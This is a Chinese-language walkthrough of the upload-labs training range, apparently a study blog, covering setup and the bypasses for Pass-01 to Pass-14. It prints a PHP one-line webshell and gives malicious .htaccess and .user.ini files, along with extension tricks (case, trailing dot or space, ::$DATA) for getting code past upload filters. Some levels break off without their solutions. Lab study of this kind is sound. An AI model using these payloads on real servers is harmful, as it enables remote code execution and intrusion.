环境部署
windows搭建
upload-labs
一个专门用于学习和测试文件上传漏洞的开源靶场
c0ny1/upload-labs:一个想帮你总结所有类型的上传漏洞的靶场 (github有时候国内访问慢)
phpstudy2018
安装好phpstudy后,将解压后的upload-labs文件夹放到phpstyudy安装地址下的PHPTutorial\WWW目录下
如果是小皮面板,放置在WWW目录下,同时要注意php的版本
Burpsuite
配合抓包使用
验证
打开phpstudy,点击开启
访问
在浏览器中输入localhost/upload-labsd/(127.0.0.1/upload-labs),出现下面的页面,就证明upload-labs安装成功
常用的测试代码
一句话木马
1<?php @eval($_POST['cmd']);? >
phpinfo
1<?php phpinfo();? >
关卡
Pass-01(JS绕过)
1、首先查看源码,允许上传.jpg/.png/.gif文件
会出现下面的页面
Pass-02(MIME验证)
方法一:上传图片文件,修改后缀 将php文件后缀名改为jpg上传,在burp中抓包进行后缀名修改
方法二:上传php文件,修改content_type 先上传一张正常的图片,抓包看数据包的内容
Pass-03(黑名单绕过-特殊后缀名)
上传一个.php3文件尝试一下,发现可以上传成功,使用burp抓包看一下内容
需要修改Apache的配置文件,将php3文件解析成php文件 修改Apache的httpd.conf文件,在此行添加.php3,然后重启服务
1 AddType application/x-httpd-php .php .phtml .php3
然后刷新网页,可以看到以下信息
Pass-04(黑名单绕过-.htaccess)
首先查看源代码
1 $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
可以自定义一个.htaccess绕过检测。 上传一个.htaccess
1<FilesMatch "3.jpg">
2SetHandler application/x-httpd-php
3</FilesMatch>
这个文件的内容是告诉Apache,当碰到3.jpg时,按照php去解析。
准备好一个3.jpg(php文件改后缀名) 分别将.htaccess和3.jpg上传到服务器,查看本地文件,可以看到已经成功上传到服务器
然后复制照片地址进行访问,显示下列页面:
Pass-05(黑名单绕过-.user.ini)
首先查看源代码:
1 $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
对比第四关的限制类型,发现.ini没有被限制
从PHP5.3.0开始,PHP支持每个目录使用.user.ini文件,这类似于.htaccess文件。除了php.ini,PHP还会再每个目录中查找.user.ini,。.user.ini文件中的配置会像php.ini中的配置一样被PHP处理
1、创建一个.user.ini文件,并把它上传
1auto_prepend_file=4.jpg
此文件的意思是:所有的php文件中都自动包含4.jpg,.user.ini相当于一个自定义的php.ini文件
然后上传4.jpg
在浏览器访问之前上传的1.php,出现下列的页面:
Pass-06 (黑名单绕过-大小写绕过)
首先查看源码,其限制条件如下:
1
2 $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
3 $file_name = trim($_FILES['upload_file']['name']);
4 $file_name = deldot($file_name);//删除文件名末尾的点
5 $file_ext = strrchr($file_name, '.');
6 $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
7 $file_ext = trim($file_ext); //首尾去空
对比前几关的限制条件,本关少了转换为小写的条件。 首先上传一个php文件,使用burp将1.php修改为1.Php(结合限制的文件类型,第一个字母大写没被限制)
访问其上传地址,得到下列画面:
Pass-07(黑名单验证-空格绕过)
首先查看源代码:
1$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
2 $file_name = $_FILES['upload_file']['name'];
3 $file_name = deldot($file_name);//删除文件名末尾的点
4 $file_ext = strrchr($file_name, '.');
5 $file_ext = strtolower($file_ext); //转换为小写
6 $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
对比上一关的条件,少了首尾去空。所以尝试空格绕过,首先上传一个php文件,使用burp抓包看一下内容
使用HackBar进行访问得到下面的页面:
Pass-08(黑名单绕过-点号绕过)
首先查看源代码:
1 $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
2 $file_name = trim($_FILES['upload_file']['name']);
3 $file_ext = strrchr($file_name, '.');
4 $file_ext = strtolower($file_ext); //转换为小写
5 $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
6 $file_ext = trim($file_ext); //首尾去空
对比上一关,这关没有使用deldot删除文件名末尾的点,所以可以使用点号绕过
查看提示如下:
burp抓包看一下内容
使用burp将5.php修改为5.php.,得到一个文件上传路径
使用HackBar访问其路径,并执行命令,得到下列页面:
Pass-09(黑名单绕过-特殊字符::$DATA绕过)
首先查看源代码:
1 $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
2 $file_name = trim($_FILES['upload_file']['name']);
3 $file_name = deldot($file_name);//删除文件名末尾的点
4 $file_ext = strrchr($file_name, '.');
5 $file_ext = strtolower($file_ext); //转换为小写
6 $file_ext = trim($file_ext); //首尾去空
对比上一关,这一个没有对::$DATA进行过滤,所以可以使用::$DATA进行绕过 使用burp抓包,将5.php修改为5.php::$DATA,得到一个文件上传地址
Pass-10(黑名单绕过-)
首先查看源代码:
1 $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
2 $file_name = trim($_FILES['upload_file']['name']);
3 $file_name = deldot($file_name);//删除文件名末尾的点
4 $file_ext = strrchr($file_name, '.');
5 $file_ext = strtolower($file_ext); //转换为小写
6 $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
7 $file_ext = trim($file_ext); //首尾去空
Pass-11
首先查看源代码:
1$is_upload = false;
2$msg = null;
3if (isset($_POST['submit'])) {
4 if (file_exists(UPLOAD_PATH)) {
5 $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");
6
7 $file_name = trim($_FILES['upload_file']['name']);
8 $file_name = str_ireplace($deny_ext,"", $file_name);
9 $temp_file = $_FILES['upload_file']['tmp_name'];
10 $img_path = UPLOAD_PATH.'/'.$file_name;
11 if (move_uploaded_file($temp_file, $img_path)) {
12 $is_upload = true;
13 } else {
14 $msg = '上传出错!';
15 }
16 } else {
17 $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
18 }
19}
本关提示:
Pass-12
首先查看源代码:
1is_upload = false;
2$msg = null;
3if(isset($_POST['submit'])){
4 $ext_arr = array('jpg','png','gif');
5 $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
6 if(in_array($file_ext,$ext_arr)){
7 $temp_file = $_FILES['upload_file']['tmp_name'];
8 $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
9
10 if(move_uploaded_file($temp_file,$img_path)){
11 $is_upload = true;
12 } else {
13 $msg = '上传出错!';
14 }
15 } else{
16 $msg = "只允许上传.jpg|.png|.gif类型文件!";
17 }
18}
提示如下:
Pass-13
查看源代码:
1$is_upload = false;
2$msg = null;
3if(isset($_POST['submit'])){
4 $ext_arr = array('jpg','png','gif');
5 $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
6 if(in_array($file_ext,$ext_arr)){
7 $temp_file = $_FILES['upload_file']['tmp_name'];
8 $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
9
10 if(move_uploaded_file($temp_file,$img_path)){
11 $is_upload = true;
12 } else {
13 $msg = "上传失败";
14 }
15 } else {
16 $msg = "只允许上传.jpg|.png|.gif类型文件!";
17 }
18}
Pass-14
查看源代码:
1function getReailFileType($filename){
2 $file = fopen($filename, "rb");
3 $bin = fread($file, 2); //只读2字节
4 fclose($file);
5 $strInfo = @unpack("C2chars", $bin);
6 $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
7 $fileType = '';
8 switch($typeCode){
9 case 255216:
10 $fileType = 'jpg';
11 break;
12 case 13780:
13 $fileType = 'png';
14 break;
15 case 7173:
16 $fileType = 'gif';
17 break;
18 default:
19 $fileType = 'unknown';
20 }
21 return $fileType;
22}
23
24$is_upload = false;
25$msg = null;
26if(isset($_POST['submit'])){
27 $temp_file = $_FILES['upload_file']['tmp_name'];
28 $file_type = getReailFileType($temp_file);
29
30 if($file_type == 'unknown'){
31 $msg = "文件未知,上传失败!";
32 }else{
33 $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
34 if(move_uploaded_file($temp_file,$img_path)){
35 $is_upload = true;
36 } else {
37 $msg = "上传出错!";
38 }
39 }
40}
本关提示:
